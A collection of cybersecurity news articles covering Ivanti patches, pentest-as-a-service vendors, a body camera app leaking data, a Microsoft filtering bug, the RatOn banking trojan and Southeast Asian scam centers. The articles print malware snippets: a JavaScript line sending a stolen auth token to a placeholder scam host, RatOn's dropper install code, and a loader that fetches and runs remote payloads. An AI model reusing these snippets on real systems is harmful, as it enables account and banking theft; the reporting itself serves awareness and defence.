• Ivanti has released security updates to address two high-severity vulnerabilities in its Endpoint Manager (EPM) software that could allow remote code execution. The vulnerabilities, tracked as CVE-2025-9712 and CVE-2025-9872, affect multiple versions of the product.

    The company has stated that it is not aware of any active exploitation of these flaws in the wild at the time of disclosure.

    Both CVE-2025-9712 and CVE-2025-9872 have been assigned a CVSS score of 8.8 out of 10.0, categorizing them as high-severity. The root cause of both flaws is an insufficient filename validation weakness, cataloged as CWE-434 (Unrestricted Upload of File with Dangerous Type).

    This type of vulnerability can allow an attacker to upload a file with a malicious or unexpected type, which can then be executed on the target system.

    For a successful attack, a remote, unauthenticated threat actor would need to trick a user into interacting with a specially crafted file. This user interaction is a critical prerequisite for exploitation.

    If an attacker successfully exploits either vulnerability, they could achieve remote code execution (RCE) on the affected system, granting them the ability to compromise the confidentiality, integrity, and availability of the system.

    The CVSS vector, AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, confirms that the attack can be launched remotely over a network, requires low complexity, needs no privileges, but depends on user interaction.

    Affected Versions and Patches

    The vulnerabilities impact Ivanti Endpoint Manager versions 2022 SU8 Security Update 1 and prior, as well as 2024 SU3 and prior versions. Ivanti has made patches available to resolve these issues.

    Administrators are strongly advised to upgrade to the following secure versions: Ivanti Endpoint Manager 2022 SU8 Security Update 2 and Ivanti Endpoint Manager 2024 SU3 Security Update 1. The security updates can be accessed through the Ivanti License System portal.

    The following table summarizes the affected and patched versions of Ivanti Endpoint Manager.

    Product Name | Affected Version(s) | Patched Version(s)
    Ivanti Endpoint Manager | 2024 SU3 and prior | 2024 SU3 Security Update 1
    Ivanti Endpoint Manager | 2022 SU8 Security Update 1 and prior | 2022 SU8 Security Update 2

    Adding a layer of urgency, Ivanti has reminded customers that the 2022 product branch is scheduled to reach its End of Life (EOL) at the end of October 2025.

    Organizations still using this branch are encouraged not only to apply the immediate security fix but also to plan a migration to a fully supported version to continue receiving security updates and technical support.

    Ivanti has confirmed that these vulnerabilities were reported through its responsible disclosure program. The company credited a researcher, identified as “06fe5fd2bc53027c4a3b7e395af0b850e7b8a044,” working with Trend Micro’s Zero Day Initiative for discovering and reporting both flaws. Because the issues were disclosed responsibly, Ivanti has not found any evidence of active exploitation or compromise.

    Consequently, there are no specific indicators of compromise (IoCs) available for administrators to search for. Despite the absence of known attacks, administrators are urged to apply the patches promptly, as threat actors often reverse-engineer security updates to develop exploits for unpatched systems.

    The post Critical Ivanti Endpoint Manager Vulnerabilities Let Attackers Execute Remote Code appeared first on Cyber Security News.

  • Penetration Testing as a Service (PTaaS) is a modern evolution of traditional pentesting that combines the speed and efficiency of a platform with the skill of human ethical hackers.

    Unlike the time-consuming, point-in-time nature of traditional engagements, PTaaS offers a continuous, on-demand, and real-time approach to finding and managing vulnerabilities.

    In 2025, with rapidly expanding attack surfaces and agile development cycles, PTaaS is an essential part of a proactive security strategy, enabling organizations to “shift-left” security and remediate vulnerabilities faster.

    Why We Chose It

    The digital landscape in 2025 is more dynamic than ever, with new code, microservices, and APIs being deployed continuously. Traditional, annual pentests simply can’t keep up.

    The companies on this list have innovated by creating a model that provides real-time visibility, streamlined collaboration, and a continuous security loop.

    This allows teams to prioritize and fix vulnerabilities as they are discovered, a fundamental shift from reactive to proactive security.

    We also chose these companies based on their ability to combine the best of both worlds: the scale of automation and the critical human context required to find complex, chained exploits and logical flaws that automated scanners miss.

    How We Chose It

    Our selection of the top PTaaS providers for 2025 is based on a few key criteria:

    Experience & Expertise (E-E): We looked for companies with a proven track record of delivering high-quality, human-led penetration tests, supported by a team of elite security experts.

    Authoritativeness & Trustworthiness (A-T): We considered their market leadership, their reputation for delivering zero false positives, and the trust they have earned from enterprise clients and the broader security community.

    Feature-Richness: We assessed the comprehensiveness of their platforms, focusing on features like real-time reporting, seamless integrations with development and vulnerability management tools, and support for a continuous testing model.

    Comparison of Key Features in 2025

    Company | Human-Led Testing | Platform/PTaaS Model | Crowdsourced Model | Continuous Testing
    Rapid7 | ✅ Yes | ✅ Yes | ❌ No | ✅ Yes
    Cobalt | ✅ Yes | ✅ Yes | ✅ Yes | ✅ Yes
    CrowdStrike | ✅ Yes | ✅ Yes | ❌ No | ✅ Yes
    Bugcrowd | ✅ Yes | ✅ Yes | ✅ Yes | ✅ Yes
    HackerOne | ✅ Yes | ✅ Yes | ✅ Yes | ✅ Yes
    Synack | ✅ Yes | ✅ Yes | ✅ Yes | ✅ Yes
    Secureworks | ✅ Yes | ✅ Yes | ❌ No | ✅ Yes
    NetSPI | ✅ Yes | ✅ Yes | ❌ No | ✅ Yes
    Bishop Fox | ✅ Yes | ✅ Yes | ❌ No | ✅ Yes
    Astra Security | ✅ Yes | ✅ Yes | ❌ No | ✅ Yes

    1. Rapid7

    Rapid7 is a leader in PTaaS, leveraging its Managed Penetration Testing service and the Vector Command Advanced platform to deliver continuous security.

    By combining a team of expert pentesters with a platform that provides real-time visibility into findings, Rapid7 helps organizations move from point-in-time assessments to continuous validation.

    Its platform integrates seamlessly with other security tools, enabling security teams to prioritize and fix vulnerabilities more efficiently.

    Why You Want to Buy It:

    Rapid7’s blend of expert-led testing and a unified platform simplifies security management, making it easy to track, manage, and remediate vulnerabilities in real time.

    The platform’s ability to contextualize risks with threat intelligence is a major differentiator.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | Team of expert pentesters.
    Platform/PTaaS | ✅ Yes | Vector Command Advanced platform for real-time visibility.
    Crowdsourced Model | ❌ No | Uses an in-house team.
    Continuous Testing | ✅ Yes | Managed service for ongoing validation.

    ✅ Best For: Enterprises that need a comprehensive, platform-driven PTaaS solution with a strong focus on compliance and continuous security validation.

    Try Rapid7 here → Rapid7 Official Website

    2. Cobalt

    Cobalt is widely regarded as a pioneer in the PTaaS space. Its platform connects companies with a highly vetted community of ethical hackers, providing a model that is both scalable and cost-effective.

    The Cobalt Platform streamlines the entire pentest lifecycle, from scoping and test execution to real-time reporting and fix validation. The intuitive dashboard and seamless integrations make it a favorite for agile, developer-centric teams.

    Why You Want to Buy It:

    Cobalt’s platform and crowdsourced model offer unparalleled speed and flexibility. You can launch a test in as little as 24 hours and get real-time results, accelerating the remediation process and helping you keep pace with development.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | A vetted community of ethical hackers (Cobalt Core).
    Platform/PTaaS | ✅ Yes | The Cobalt platform for end-to-end management.
    Crowdsourced Model | ✅ Yes | Leverages a global community of specialists.
    Continuous Testing | ✅ Yes | Supports continuous and on-demand testing.

    ✅ Best For: Companies with fast-paced development cycles that need on-demand, flexible, and continuous security testing.

    Try Cobalt here → Cobalt.io Official Website

    3. CrowdStrike

    CrowdStrike, a leader in endpoint security, provides a robust PTaaS offering that is deeply integrated with its Falcon platform.

    By leveraging its unparalleled threat intelligence, CrowdStrike’s team of elite pentesters can simulate the tactics, techniques, and procedures (TTPs) of real-world adversaries.

    The platform provides a unified view of security posture and vulnerabilities, enabling security teams to validate their defenses against the latest attack methods.

    Why You Want to Buy It:

    CrowdStrike’s PTaaS is unique because it’s informed by real-time threat data from the Falcon platform. This ensures that the test isn’t just a checklist exercise but a realistic simulation of a targeted attack.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | A team of elite offensive security professionals.
    Platform/PTaaS | ✅ Yes | Integrates with the CrowdStrike Falcon platform.
    Crowdsourced Model | ❌ No | Uses an in-house team.
    Continuous Testing | ✅ Yes | Services are designed for continuous validation.

    ✅ Best For: Organizations that want a penetration test driven by elite threat intelligence, with the goal of validating their security controls against active threats.

    Try CrowdStrike here → CrowdStrike Official Website

    4. Bugcrowd

    Bugcrowd, a pioneer in crowdsourced security, offers a PTaaS solution that leverages its massive community of ethical hackers.

    Its platform provides a flexible and scalable way to conduct penetration tests, bug bounty programs, and vulnerability disclosure programs.

    The platform’s real-time dashboard and robust workflow tools streamline the entire process, from finding a vulnerability to validating its fix.

    Why You Want to Buy It:

    Bugcrowd’s crowdsourced model provides access to a diverse set of skills and a “follow-the-sun” approach to testing.

    This enables you to get a comprehensive assessment of your attack surface from a wide range of perspectives, often leading to the discovery of vulnerabilities that might be missed by a single team.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | A vast community of vetted researchers.
    Platform/PTaaS | ✅ Yes | Provides a platform for managing tests.
    Crowdsourced Model | ✅ Yes | Pioneer in crowdsourced security.
    Continuous Testing | ✅ Yes | Supports continuous testing and bug bounty programs.

    ✅ Best For: Companies that want to leverage the power of a global community of ethical hackers for both formal pentests and continuous bug bounty programs.

    Try Bugcrowd here → Bugcrowd Official Website

    5. HackerOne

    HackerOne, best known for its world-leading bug bounty platform, has successfully extended its model to include managed PTaaS. Its platform provides a seamless interface for managing engagements with a community of vetted ethical hackers.

    HackerOne’s PTaaS solution offers a more structured, project-based approach compared to a bug bounty, with clear deliverables and reporting, while still maintaining the flexibility and scale of its crowdsourced community.

    Why You Want to Buy It:

    HackerOne’s PTaaS is a powerful blend of formal testing and crowdsourced intelligence. It offers a structured and predictable engagement while giving you access to an immense talent pool, ensuring high-quality results.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | Access to a vast community of ethical hackers.
    Platform/PTaaS | ✅ Yes | A platform for managing managed pentests and bug bounties.
    Crowdsourced Model | ✅ Yes | The world’s largest bug bounty platform.
    Continuous Testing | ✅ Yes | Supports continuous testing and managed bug bounties.

    ✅ Best For: Organizations that want to use a single platform to manage both formal penetration tests and ongoing bug bounty programs.

    Try HackerOne here → HackerOne Official Website

    6. Synack

    Synack has a unique PTaaS model that combines a private, curated community of elite hackers (the Synack Red Team) with an advanced AI-powered platform.

    The platform’s agentic AI, named Sara, automates reconnaissance and vulnerability discovery, which allows human testers to focus on finding and exploiting the most complex vulnerabilities.

    This hybrid intelligence approach provides comprehensive coverage and a deeper level of testing.

    Why You Want to Buy It:

    Synack’s model is a glimpse into the future of security testing.

    By pairing a trusted community with AI-powered automation, they deliver a highly efficient and effective test that is constantly learning and adapting, providing a superior level of security assurance.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | The elite Synack Red Team.
    Platform/PTaaS | ✅ Yes | An AI-powered platform for reconnaissance and management.
    Crowdsourced Model | ✅ Yes | A curated, private community.
    Continuous Testing | ✅ Yes | Active offense with continuous asset discovery.

    ✅ Best For: Security-conscious organizations that need a high-end, scalable PTaaS solution that blends automation with elite, human-led testing.

    Try Synack here → Synack Official Website

    7. Secureworks

    Secureworks provides threat intelligence-driven PTaaS that is backed by its Counter Threat Unit™ (CTU) research team. This ensures that every test is a realistic simulation of current and emerging threats.

    The company’s PTaaS model allows for a continuous, strategic approach to security validation, with findings and remediation guidance delivered through a platform that simplifies reporting and collaboration.

    Why You Want to Buy It:

    Secureworks’s unique access to threat intelligence ensures that your pentest will not be a static exercise but a dynamic one, emulating the TTPs of active attackers.

    This provides invaluable insight into your organization’s resilience against modern threats.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | A team of certified pentesters.
    Platform/PTaaS | ✅ Yes | Findings and reporting managed via platform.
    Crowdsourced Model | ❌ No | In-house team.
    Continuous Testing | ✅ Yes | Provides continuous security validation.

    ✅ Best For: Companies that want a penetration test that is directly informed by real-world threat intelligence and backed by a highly respected research team.

    Try Secureworks here → Secureworks Official Website

    8. NetSPI

    NetSPI is a top-tier offensive security firm with a strong PTaaS platform. Its platform is designed to streamline the entire penetration testing lifecycle, from scoping to remediation.

    NetSPI’s PTaaS platform provides a single interface for clients to collaborate with expert pentesters, view real-time findings, and get actionable remediation advice.

    The company’s deep expertise in cloud, network, and application security makes it a go-to for complex environments.

    Why You Want to Buy It:

    NetSPI’s combination of a powerful platform and an in-house team of 300+ security experts provides an unparalleled blend of technical depth and operational efficiency.

    The platform simplifies the entire process, making it easy to manage a large-scale security program.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | A large, in-house team of security experts.
    Platform/PTaaS | ✅ Yes | The NetSPI Platform for managing engagements.
    Crowdsourced Model | ❌ No | In-house team.
    Continuous Testing | ✅ Yes | Supports continuous testing and attack surface management.

    ✅ Best For: Large enterprises and mid-market organizations that need to scale their penetration testing program with a single, unified platform and a highly experienced in-house team.

    Try NetSPI here → NetSPI Official Website

    9. Bishop Fox

    Bishop Fox is a pure-play offensive security firm with an elite reputation. Its PTaaS offering, Continuous Attack Surface Testing (CAST), is a managed service that combines automated attack surface monitoring with expert-led penetration testing.

    The CAST service is a unique hybrid model that provides the continuous visibility of a platform with the deep, hands-on expertise of Bishop Fox’s elite hacking team.

    This approach ensures that your external perimeter is constantly monitored and validated against new threats.

    Why You Want to Buy It:

    Bishop Fox’s PTaaS is not just a service; it’s a strategic partnership.

    The company’s CAST service provides a continuous, high-fidelity view of your external attack surface, helping you find vulnerabilities before an attacker does.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | The elite “Fox” team of security professionals.
    Platform/PTaaS | ✅ Yes | The CAST platform for continuous testing.
    Crowdsourced Model | ❌ No | In-house team.
    Continuous Testing | ✅ Yes | Continuous Attack Surface Testing (CAST) service.

    ✅ Best For: Companies that want a high-end, managed service that combines the continuous visibility of a platform with the deep technical expertise of a top-tier offensive security firm.

    Try Bishop Fox here → Bishop Fox Official Website

    10. Astra Security

    Astra Security is a PTaaS provider that focuses on delivering a comprehensive and hassle-free penetration testing experience.

    Its platform and team of certified experts provide a blend of automated and manual testing for a wide range of assets, including web apps, mobile apps, and APIs.

    The platform’s easy-to-use interface and detailed, actionable reports make it a great choice for companies of all sizes.

    Why You Want to Buy It:

    Astra Security’s platform simplifies the entire pentesting process, from initial setup to remediation.

    Its focus on detailed, zero-false-positive reports and actionable guidance makes it easy for internal teams to address vulnerabilities effectively.

    Feature | Yes/No | Specification
    Human-Led Testing | ✅ Yes | Certified and experienced security experts.
    Platform/PTaaS | ✅ Yes | A platform for managing and reporting findings.
    Crowdsourced Model | ❌ No | In-house team.
    Continuous Testing | ✅ Yes | Continuous automated and manual pentesting.

    ✅ Best For: Small and medium-sized businesses (SMBs) and organizations that need a user-friendly and comprehensive PTaaS solution for compliance and security.

    Try Astra Security here → Astra Security Official Website

    Conclusion

    In 2025, PTaaS is the definitive answer to the challenges of traditional, point-in-time penetration testing.

    The best companies in this space have moved beyond simple tool-based testing, creating dynamic platforms that combine human ingenuity with the scale of technology.

    For organizations that value the speed and flexibility of a crowdsourced model, Cobalt, Bugcrowd, and HackerOne are leading choices.

    For enterprises that need a deeper, more strategic assessment informed by elite threat intelligence, CrowdStrike, Secureworks, and NetSPI provide unparalleled expertise.

    Lastly, for companies that want a hybrid model that blends continuous monitoring with expert-led testing, Bishop Fox and Synack are at the cutting edge.

    Ultimately, the right PTaaS provider will not only help you find vulnerabilities but also integrate security into your business processes, ensuring your defenses are as agile and dynamic as the threats you face.

    The post Top 10 Best Penetration Testing as a Service (PTaaS) Companies in 2025 appeared first on Cyber Security News.

  • Police-issued body cameras have become ubiquitous tools for recording law enforcement encounters, yet a recent investigation has uncovered troubling design choices in a budget-friendly system that compromise both privacy and data integrity.

    The Viidure mobile application, designed to transfer video evidence from the camera’s onboard Wi-Fi hotspot to cloud servers, was found to communicate over a nonstandard TLS port, directing sensitive information to servers based in China.

    This behavior raises significant concerns for departments relying on these devices to produce court-admissible evidence.

    Initial traffic captures revealed that the mobile app establishes TLS connections to app-api.lufengzhe.com:9091, alongside geolocation API calls to api.map.baidu.com:443 and loc.map.baidu.com:443.

    Camera (Source – Brown Fine Security)

    Whois queries confirmed that the primary endpoint at 115.175.147.124 is owned by Huawei International Pte. Ltd. and originates from a Chinese network block.

    The use of port 9091—uncommon for HTTPS traffic—signals an attempt to obscure routine data flows, potentially evading network-based monitoring tools.

    Brown Fine Security analysts noted that the app’s reliance on improperly validated server certificates enabled a straightforward man-in-the-middle (MitM) attack.

    By injecting forged certificates via a custom mitmrouter setup, researchers were able to intercept plaintext HTTP exchanges within the TLS tunnel.

    Such misconfigurations not only expose metadata like IMEI numbers and usernames but also threaten the confidentiality of recorded video streams.

    Mitmrouter diagram (Source – Brown Fine Security)

    Beyond mere metadata, the intercepted payloads include device identifiers and application version details.

    The following snippet illustrates the HTTP POST request captured during the MitM session:

    POST /iot/api/v1/version/check HTTP/1.1
    Host: app-api.lufengzhe.com:9091
    Content-Type: application/json
    srapi_imei: 17562212185897060
    srapi_time: 1757047550015
    
    {
      "data": [
        {
          "model": "6zhentan_android",
          "version": "v2.7.1.250712",
          "imei": "17562212185897060"
        }
      ],
      "username": "<redacted>"
    }

    Infection Mechanism and Data Exfiltration

    The Viidure application does not self-install malware but functions as an inadvertent exfiltration vector due to its insecure communications design.

    Upon pairing with the camera’s hotspot, the app automatically initiates background data uploads without user notification.

    TLS connections to the Chinese endpoint are established immediately, transmitting identifying information alongside any captured media metadata.

    The use of port 9091 appears deliberate, likely to bypass conventional TLS inspection rules that focus on ports 443 and 8443.

    Persistence of this behavior stems from the application’s versioning system. Every time the app checks for updates—triggered at startup and periodically during use—it reaffirms the connection to the malicious endpoint.

    Without rigorous certificate validation or user consent dialogs, departmental networks may remain unaware of routine data streams exiting to unauthorized servers.

    Security teams should prioritize network segmentation and deep packet inspection rules that include nonstandard ports to detect and disrupt similar data flows.
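    As an added example of the kind of rule that recommendation implies (not part of the original report or of Brown Fine Security's tooling), the script below runs two checks over constructed connection-log lines in a Zeek-like layout: TLS on a port outside the usual inspection set, and any destination matching the endpoints named above. The internal IPs, the non-Huawei addresses and the log format itself are constructed for the example.

```python
"""Flags TLS sessions on nonstandard ports and connections to the endpoints
the article names, over constructed connection-log lines. Added example;
not the original report's or Brown Fine Security's code."""
import ipaddress

# Destinations named in the article. The IP is the one the article's Whois
# lookup attributed to Huawei International Pte. Ltd.
WATCHLIST_HOSTS = {"app-api.lufengzhe.com", "api.map.baidu.com", "loc.map.baidu.com"}
WATCHLIST_IPS = {ipaddress.ip_address("115.175.147.124")}
# Ports that typical TLS inspection rules cover; anything else is worth a look.
STANDARD_TLS_PORTS = {443, 8443}

# Constructed sample, tab-separated:
# ts, src_ip, dst_ip, dst_port, service, server_name (SNI, '-' if absent).
# Only the first line's destination comes from the article; the rest are
# documentation-range addresses made up for the example.
SAMPLE_LOG = """\
1757047550.015\t10.20.30.41\t115.175.147.124\t9091\tssl\tapp-api.lufengzhe.com
1757047551.220\t10.20.30.41\t198.51.100.7\t443\tssl\tapi.map.baidu.com
1757047552.410\t10.20.30.42\t203.0.113.10\t443\tssl\tupdates.example.org
1757047553.002\t10.20.30.43\t203.0.113.25\t8443\tssl\tportal.example.org
1757047554.118\t10.20.30.44\t192.0.2.77\t9091\tssl\t-
1757047555.900\t10.20.30.44\t192.0.2.80\t80\thttp\t-
"""


def parse_line(line):
    """Split one log line into a record; raise on a malformed line."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 6:
        raise ValueError(f"expected 6 fields, got {len(fields)}: {line!r}")
    ts, src, dst, port, service, sni = fields
    return {
        "ts": ts,
        "src": src,
        "dst": ipaddress.ip_address(dst),
        "port": int(port),
        "service": service,
        "sni": None if sni == "-" else sni,
    }


def evaluate(record):
    """Return the list of reasons a record is suspicious (empty if none)."""
    reasons = []
    if record["service"] == "ssl" and record["port"] not in STANDARD_TLS_PORTS:
        reasons.append(f"tls-on-nonstandard-port:{record['port']}")
    if record["sni"] in WATCHLIST_HOSTS:
        reasons.append(f"watchlist-sni:{record['sni']}")
    if record["dst"] in WATCHLIST_IPS:
        reasons.append(f"watchlist-ip:{record['dst']}")
    return reasons


def flag_connections(log_text):
    """Run evaluate() over every line; return (src, dst, port, reasons)."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        rec = parse_line(line)
        reasons = evaluate(rec)
        if reasons:
            findings.append((rec["src"], str(rec["dst"]), rec["port"], reasons))
    return findings


if __name__ == "__main__":
    for src, dst, port, reasons in flag_connections(SAMPLE_LOG):
        print(f"{src} -> {dst}:{port}  {', '.join(reasons)}")
```

Note that the baidu geolocation calls are caught only by the SNI watchlist, since they use port 443: a port-only rule would have missed them.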

    The post Police Body Camera Apps Sending Data to Cloud Servers Hosted in China Via TLS Port 9091 appeared first on Cyber Security News.

  • A widespread issue with Microsoft’s anti-spam filtering service is preventing some Exchange Online and Microsoft Teams users from opening URLs, disrupting workflows across organizations.

    The problem, tracked under Microsoft advisory MO1148487, remains ongoing as the company works on a permanent fix.

    According to Microsoft, the issue stems from an anti-spam detection mechanism that is mistakenly flagging certain URLs as malicious.

    Specifically, URLs nested within other URLs have been incorrectly identified as threats. As a result, impacted users are unable to open hyperlinks shared in Exchange Online emails or Microsoft Teams chats.
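    Nested URLs are common in legitimate mail (redirect and link-wrapping services carry the real target inside a query parameter or path), which is why a blanket rule on them misfires. As an added example (not Microsoft's detection logic), the helper below unwraps such a link layer by layer so an analyst can judge the innermost destination when triaging one of these alerts; the sample wrapper URL and host names are constructed.

```python
"""Unwraps URLs nested inside other URLs so the final destination can be
assessed. Added example; not Microsoft's anti-spam logic."""
import re
from urllib.parse import parse_qs, unquote, urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
MAX_DEPTH = 5  # guard against pathological nesting or wrapper loops

# Constructed sample: two layers of wrapping, each percent-encoded once more
# than the last, as a mail flow that passes through two rewriting services
# might produce.
SAMPLE_NESTED = (
    "https://outer.example.com/redirect?target="
    "https%3A%2F%2Fmiddle.example.net%2Fgo%3Fu%3D"
    "https%253A%252F%252Finner.example.org%252Fdoc"
)


def _embedded_urls(url):
    """Yield every http(s) URL carried in url's query values or path."""
    parsed = urlparse(url)
    candidates = []
    # parse_qs already percent-decodes one layer of the query values.
    for values in parse_qs(parsed.query, keep_blank_values=True).values():
        candidates.extend(values)
    # Some wrappers put the target in the path, e.g. /redirect/https://...
    candidates.append(unquote(parsed.path))
    for cand in candidates:
        match = URL_RE.search(cand)
        if match:
            yield match.group(0)


def unwrap(url, max_depth=MAX_DEPTH):
    """Return the chain from the outermost wrapper to the innermost target."""
    chain = [url]
    seen = {url}
    current = url
    for _ in range(max_depth):
        inner = next(_embedded_urls(current), None)
        if inner is None or inner in seen:
            break
        chain.append(inner)
        seen.add(inner)
        current = inner
    return chain


def triage(url, trusted_hosts):
    """Summarize a flagged link: depth of nesting and the host that matters."""
    chain = unwrap(url)
    host = urlparse(chain[-1]).hostname
    verdict = "trusted-destination" if host in trusted_hosts else "review"
    return {"depth": len(chain) - 1, "final_host": host, "verdict": verdict}


if __name__ == "__main__":
    for layer, link in enumerate(unwrap(SAMPLE_NESTED)):
        print(f"layer {layer}: {link}")
    print(triage(SAMPLE_NESTED, {"inner.example.org"}))
```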

    In addition to blocking link access, administrators have reported false alerts titled “A potentially malicious URL click was detected involving one user.”

    Microsoft has confirmed that the URLs being flagged are safe and emphasized that the warnings are erroneous. Some email messages have also been quarantined unnecessarily, adding to the disruption for businesses relying on Exchange and Teams for communication.

    The problem has led to confusion in organizations where security alerts typically trigger incident response processes. While the impact is widespread, Microsoft has assured users that the majority of issues have already been mitigated. However, residual link-access problems remain for some users as the company continues to fine-tune its anti-spam service.

    Microsoft’s Response and Next Steps

    In its latest update on September 9, 2025, at 08:25 AM UTC, Microsoft announced that it had identified a new subset of affected URLs and is actively addressing them alongside any leftover impacts from the initial issue. Engineers are also performing a root cause analysis to prevent recurrence.

    Microsoft stated: “We’re confident that a majority of the impact has been resolved, and we’re actively addressing lingering issues. Our teams are continuing to examine the anti-spam detection systems that incorrectly flagged these URLs.”

    The company has set the next official progress update for 6:00 PM UTC on September 9, 2025. Until then, customers may experience intermittent issues opening links in affected messages.

    Microsoft has advised admins and users to monitor the Service Health Dashboard for updates. While the company continues to remediate, organizations are urged not to treat the current alerts as genuine threats, as the flagged URLs have been confirmed to be safe.

    The post Microsoft Anti-Spam Bug Blocks Users From Opening URLs in Exchange Online and Teams appeared first on Cyber Security News.

  • Cybersecurity researchers have observed the emergence of a novel Android banking trojan, RatOn in recent months that seamlessly combines remote access capabilities with NFC relay technology and Automated Transfer System (ATS) functions.

    Initially detected in mid-July 2025, RatOn’s multi-stage architecture leverages a dropper application to install subsequent payloads, culminating in full device takeover and fraudulent transaction execution.

    The trojan is distributed via adult-themed domains masquerading as third-party installers, targeting Czech and Slovakian users in its early campaign.

    Its sophisticated design allows attackers to abuse Accessibility and Device Administrator permissions for both screen-state monitoring and automated interactions with legitimate banking applications.

    Threat Fabric analysts noted that RatOn’s developers appear to have written the malware entirely from scratch, with no apparent code reuse from existing Android banking families.

    Following installation, the first payload requests Accessibility service access through a WebView interface and subsequently escalates privileges to manage system settings and contacts.

    Accessibility services (Source – Threat Fabric)

    Once granted, these permissions enable the trojan to operate stealthily in the background, capturing on-screen elements via Accessibility API rather than resource-intensive screen casting.

    RatOn then loads a third-stage payload—NFSkate malware—originally designed for NFC relay attacks, effectively combining card skimming with remote device control.

    Threat Fabric researchers identified that the automated transfer feature focuses specifically on a Czech banking application, “George Česko.”

    Upon receiving a JSON-formatted command from its control server, RatOn launches the targeted banking app and simulates user interactions, including PIN entry, to execute unauthorized transfers.

    This level of precision indicates a deep understanding of the bank’s user interface, down to coordinate-based clicking when element-based search fails.

    Notably, the trojan automatically confirms transaction PINs, which are harvested during earlier phishing or overlay steps, ensuring fraudulent transfers proceed without user intervention.

    JavaScript code for the Install button that calls the exposed function (Source – Threat Fabric)

    In one observed transfer routine, the operator issues a JSON object to RatOn containing recipient details:

    {
      "command_id": "transfer",
      "receiver_name": "John Doe",
      "account_number": "CZ6508000000001234567899",
      "amount": "15000",
      "currency": "CZK"
    }

    Infection Mechanism

    RatOn’s infection chain begins with a dropper application that prompts the victim to enable third-party app installations.

    Upon user approval, the dropper creates a WebView pointing to a hardcoded URL and exposes an installApk() function to the page.

    When the victim taps the on-screen button, the dropper invokes installApk() to sideload the second-stage payload:

    webView.addJavascriptInterface(new Object() {
        @JavascriptInterface
        public void installApk() {
            PackageInstaller.SessionParams params =
                new PackageInstaller.SessionParams(PackageInstaller.SessionParams.MODE_FULL_INSTALL);
            int sessionId = packageInstaller.createSession(params);
            // ... install logic for payload.apk ...
            packageInstaller.openSession(sessionId).write(...);
            packageInstaller.openSession(sessionId).commit(...);
        }
    }, "DropperInterface");

    After installation, the payload immediately requests Accessibility and Device Admin privileges via additional WebView dialogs.

    By exploiting these elevated permissions, RatOn establishes persistence and evades detection: it intercepts permission dialogs, automatically accepts requests, and locks the device for ransom if necessary.

    The combination of overlay attacks, NFC relay components, and automated transactions makes RatOn one of the most advanced banking trojans to date.

    The post New RatOn Takes Control Over Bank Account and Initiates Automated Money Transfers appeared first on Cyber Security News.

  • Frankfurt am Main, Germany, September 9th, 2025, CyberNewsWire The threat landscape surrounding distributed denial-of-service (DDoS) attacks intensified significantly in the first half of 2025, according to the latest Link11 European Cyber Report.  Documented attacks targeting the Link11 network increased by 225% compared to the same period in 2024. The report highlights not only a marked rise in attack […]

    The post Link11 Reports 225% more DDoS attacks in H1 2025 with new tactics against infrastructure appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Threat actors are abusing HTTP client tools like Axios in conjunction with Microsoft’s Direct Send feature to form a “highly efficient attack pipeline” in recent phishing campaigns, according to new findings from ReliaQuest. “Axios user agent activity surged 241% from June to August 2025, dwarfing the 85% growth of all other flagged user agents combined,” the cybersecurity company said in a


  • The U.S. Department of the Treasury has unveiled a sweeping sanctions campaign against a network of cyber scam centers across Southeast Asia that collectively stole more than ten billion dollars from American victims in 2024.

    These operations, often masquerading as legitimate virtual currency investment platforms, relied on sophisticated social engineering techniques to coax users into wiring funds, only to abscond with deposits once trust had been established.

    From trampling human rights through forced labor to deploying high-pressure quotas for coerced operators, the network’s reach extended from isolated compounds in Myanmar to casino resorts turned criminal hubs in Cambodia.

    Emerging in earnest during the pandemic’s early months, these “pig butchering” scams combined elements of romance fraud, mobile messaging exploits and fraudulent blockchain tutorials to create an illusion of credible returns.

    Virtual currency investment websites were provisioned with real-time price feeds, SSL certificates and user dashboards that mimicked reputable exchanges.

    Backend malware kits, often installed on coercively recruited operators’ workstations, facilitated automated spoofing of payment notifications and social account takeovers.

    U.S. Treasury analysts identified code modules that intercepted SMS one-time-passcodes and injected synthetic transaction confirmations, enabling scammers to bypass two-factor authentication with alarming reliability.

    As these centers scaled up, trafficked individuals—some held under threat of debt bondage—were trained to run callers through scripted dialogues that leveraged open-source intelligence to personalize pitches.

    Victims were prompted to run benign-looking JavaScript snippets in their browsers to “verify wallet connectivity,” unknowingly granting scam operators access to their local session storage.

    An example of this malicious script, recovered during Treasury investigations, illustrates how session tokens were harvested:

    (async () => {
      const token = localStorage.getItem('auth_token');
      await fetch('https://malicious.scam/api/steal', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ token, balance: window.wallet.balance })
      });
    })();

    U.S. Treasury analysts noted that this snippet bypassed common Content Security Policy (CSP) restrictions by exploiting browser extensions that allowed remote script injection through JSON-RPC interfaces.

    Persistence Tactics

    Within the heart of the Burma-based hub known as Yatai New City, operators deployed custom persistence mechanisms to maintain continuous control over compromised accounts and internal workstations.

    A lightweight C# loader, dubbed “BeaconYatai,” was embedded within legitimate video conferencing tools to establish resilient command-and-control channels.

    Once installed, BeaconYatai registered itself as a Windows service named “SvcUpdate,” automatically relaunching at boot.

    The service periodically polled a disguised endpoint on the Telegram API to fetch encrypted task payloads, decrypting them using a hardcoded RSA key:

    RSAParameters rsaKey = LoadKey("-----BEGIN RSA PRIVATE KEY-----...");
    byte[] payload = FetchFromTelegram().Decrypt(rsaKey);
    ExecutePayload(payload);

    Yatai New City Compound Layout (Source – US Treasury)
